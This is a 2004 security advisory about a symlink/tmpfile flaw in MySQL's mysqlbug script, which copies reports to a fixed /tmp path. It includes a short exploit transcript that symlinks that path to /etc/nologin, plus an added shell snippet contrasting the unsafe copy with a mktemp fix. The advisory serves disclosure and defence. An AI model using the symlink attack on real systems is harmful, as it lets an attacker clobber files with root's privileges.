mysqlbug tmpfile/symlink vulnerability.
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
Product: mysqlbug packaged with MySQL.
Versions: All
Bug: Symlink bug / tmpfile bug.
Impact: Attackers can overwrite arbitrary files.
Risk: Low/Medium
Date: March 24, 2004
Author: Shaun Colley
Email: shaunige yahoo co uk
WWW: http://www.nettwerked.co.uk
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
Introduction
#############
MySQL is an open-source, fast and popular SQL
database, in widespread use across the Internet. As
with many other popular products, a bug report script
is packaged with MySQL, named mysqlbug. This script
is vulnerable to a tmpfile/symlink bug.
Details
########
When mysqlbug is run, a text editor is launched and
the user is prompted to write their bug report, using a
template to guide them.
The issue lies in how the script handles a user simply
exiting the text editor without changing the bug
report. When this happens, the mysqlbug script does the
following:
--
if cmp -s $TEMP $TEMP.x
then
  echo "File not changed, no bug report submitted."
  cp $TEMP /tmp/failed-mysql-bugreport
  echo "The raw bug report exists in /tmp/failed-mysql-bugreport"
  echo "If you use this remember that the first lines of the report now is a lie .."
  exit 1
fi
--
As can be seen, no attempt is made to create the
temporary file securely: the script just does a quick
'cp' to an unchecked, fixed path
(/tmp/failed-mysql-bugreport). Because 'cp' follows a
symlink at the destination, an attacker who has already
planted a symlink with this name can have the report
written over an arbitrary file.
This could be bad if a root user had invoked mysqlbug
and then decided to exit the text editor to gather more
information on their potential bug, while in the
meantime the attacker had symlinked
/tmp/failed-mysql-bugreport to /etc/nologin or some
other sensitive file.
Successful exploitation of the symlink bug would allow
an attacker to overwrite arbitrary files with the
privileges of the user invoking 'mysqlbug'.
It should be noted that this vulnerability can ONLY be
exploited if the user exits the text editor invoked by
mysqlbug before editing the content.
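As an added illustration, not part of the original advisory and not the MySQL project's fix, the following shell snippet puts the fixed-name copy from mysqlbug next to a version built on mktemp and checks both against a planted symlink. The directory argument, file names and contents are constructed for the demo so it runs in a scratch directory instead of /tmp.

```shell
#!/bin/sh
# Added example, not the MySQL project's patch: the fixed-name copy from
# mysqlbug next to a version that cannot be redirected through a symlink.
# The directory argument is a constructed parameter so the demo can run
# in a scratch directory instead of /tmp.

# Unsafe (as in mysqlbug): a predictable name, and cp opens whatever is
# already there, following a planted symlink to its target.
unsafe_save_report() {
    cp "$1" "$2/failed-mysql-bugreport"
}

# Safe: mktemp creates a fresh file with O_CREAT|O_EXCL under an
# unpredictable name, so an existing symlink is never opened; the real
# path is printed so the user can find the report afterwards.
safe_save_report() {
    out=$(mktemp "$2/failed-mysql-bugreport.XXXXXX") || return 1
    cp "$1" "$out" || return 1
    printf '%s\n' "$out"
}

# Constructed scenario: a symlink named failed-mysql-bugreport pointing
# at a stand-in for the file an attacker would want clobbered.
setup_scenario() {
    work=$(mktemp -d) || return 1
    printf 'original contents\n' > "$work/victim"
    printf 'bug report text\n' > "$work/report"
    ln -s "$work/victim" "$work/failed-mysql-bugreport"
    printf '%s\n' "$work"
}

# Returns 0 when the unsafe copy overwrote the symlink target (the bug).
check_unsafe() {
    work=$(setup_scenario) || return 1
    unsafe_save_report "$work/report" "$work"
    [ "$(cat "$work/victim")" = "bug report text" ]
}

# Returns 0 when the safe copy left the target alone and the report
# landed in a freshly created file with a different name.
check_safe() {
    work=$(setup_scenario) || return 1
    saved=$(safe_save_report "$work/report" "$work") || return 1
    [ "$(cat "$work/victim")" = "original contents" ] &&
    [ "$saved" != "$work/failed-mysql-bugreport" ] &&
    [ "$(cat "$saved")" = "bug report text" ]
}
```

Calling check_unsafe and then check_safe from a shell that has sourced the file shows the symlink being followed in the first case and ignored in the second.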
Exploitation
#############
All that is required to exploit the issue is to create
a symlink from /tmp/failed-mysql-bugreport to an
arbitrary file. An example attack is presented below:
--
attacker$ ls -al /etc/nologin
ls: /etc/nologin: No such file or directory
attacker$ ln -s /etc/nologin /tmp/failed-mysql-bugreport
[...]
root# mysqlbug
[root decides to exit the text editor that mysqlbug
started, because he wants to get more info on his
discovered bug]
attacker$ ls -al /etc/nologin
-rw-r--r-- 1 root root 0 Mar 24 16:50 /etc/nologin
--
Solution
#########
The bug has been fixed, and the patched mysqlbug
script has been committed to the MySQL source
repository. The latest available version, including
the bugfix, can be built from the source tree:
<http://www.mysql.com/doc/en/Installing_source_tree.html>
If you do not wish to access the source repository
immediately for a less critical security issue, the
fixed script will also be incorporated into the next
full release of MySQL.
Credit
#######
Issue discovered by Shaun Colley / shaun2k2 -
<shaunige yahoo co uk>.
Thanks to the MySQL team for responding and fixing the
bug within 2 hours, despite the bug being a
non-critical issue and other things taking priority.
Thank you for your time.
Shaun.